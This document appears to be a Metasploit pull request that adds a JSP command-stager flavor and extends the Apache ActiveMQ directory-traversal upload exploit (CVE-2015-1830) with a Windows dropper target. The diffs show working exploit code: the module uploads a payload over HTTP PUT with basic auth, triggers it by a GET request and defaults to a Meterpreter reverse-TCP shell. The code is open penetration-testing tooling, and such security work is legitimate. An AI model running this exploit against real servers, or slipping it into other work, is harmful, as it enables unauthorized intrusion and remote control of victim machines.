### PR TITLE
Add support for the JSP CmdStager

### DIFF
--- a/lib/msf/core/exploit/cmd_stager.rb
+++ b/lib/msf/core/exploit/cmd_stager.rb
@@ -26,7 +26,8 @@ module Exploit::CmdStager
     :curl => Rex::Exploitation::CmdStagerCurl,
     :fetch => Rex::Exploitation::CmdStagerFetch,
     :lwprequest => Rex::Exploitation::CmdStagerLwpRequest,
-    :psh_invokewebrequest => Rex::Exploitation::CmdStagerPSHInvokeWebRequest
+    :psh_invokewebrequest => Rex::Exploitation::CmdStagerPSHInvokeWebRequest,
+    :jsp => Rex::Exploitation::CmdStagerJSP
   }
 
   # Constant for decoders - used when checking the default flavor decoder.

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -33,6 +33,11 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'EDB', '40857'],
           [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
         ],
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        },
         'Privileged' => false,
         'Platform' => %w[win],
         'Targets' => [
@@ -110,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
-  def execute_command(cmd, opts={})
+  def execute_command(cmd, _opts = {})
     print_status('Uploading payload...')
     testfile = Rex::Text.rand_text_alpha(10)
     vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") # This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
@@ -121,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       },
       'method' => 'PUT',
-      'data' => cmd#payload.encoded
+      'data' => cmd # payload.encoded
     })
 
     print_status('Payload sent. Attempting to execute the payload.')
@@ -138,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::PayloadFailed, 'Failed to execute the payload')
     end
   end
-  
+
   def exploit
     if target['Type'] == :stager
       execute_cmdstager(

--- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
+++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -39,17 +40,26 @@ class MetasploitModule < Msf::Exploit::Remote
             'Windows Java',
             {
               'Arch' => ARCH_JAVA,
+              'Type' => :java_payload,
               'Platform' => 'win'
             }
           ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Type' => :stager,
+              'Platform' => 'win'
+            }
+          ]
         ],
         'DisclosureDate' => '2015-08-19',
         'License' => MSF_LICENSE,
         'DefaultOptions' => {
           'RPORT' => 8161,
-          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+          'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
         },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 1
       )
     )
 
@@ -100,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
-  def exploit
+  def execute_command(cmd, opts={})
     print_status('Uploading payload...')
     testfile = Rex::Text.rand_text_alpha(10)
     vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") # This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
@@ -111,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       },
       'method' => 'PUT',
-      'data' => payload.encoded
+      'data' => cmd#payload.encoded
     })
 
     print_status('Payload sent. Attempting to execute the payload.')
@@ -126,6 +136,16 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good('Payload executed!')
     else
       fail_with(Failure::PayloadFailed, 'Failed to execute the payload')
+    end
+  end
+  
+  def exploit
+    if target['Type'] == :stager
+      execute_cmdstager(
+        flavor: :jsp
+      )
+    elsif target['Type'] == :java_payload
+      execute_command(payload.encoded)
     end
   end
 end


### PR DESCRIPTION
This PR enables the use of the JSP CmdStager within the metasploit framework.

Related to https://github.com/rapid7/rex-exploitation/pull/25 .

## Verification
Verification of this should be simple, as it's just a one-line addition.

Modules making use of this JSP CmdStager will follow in the upcoming days.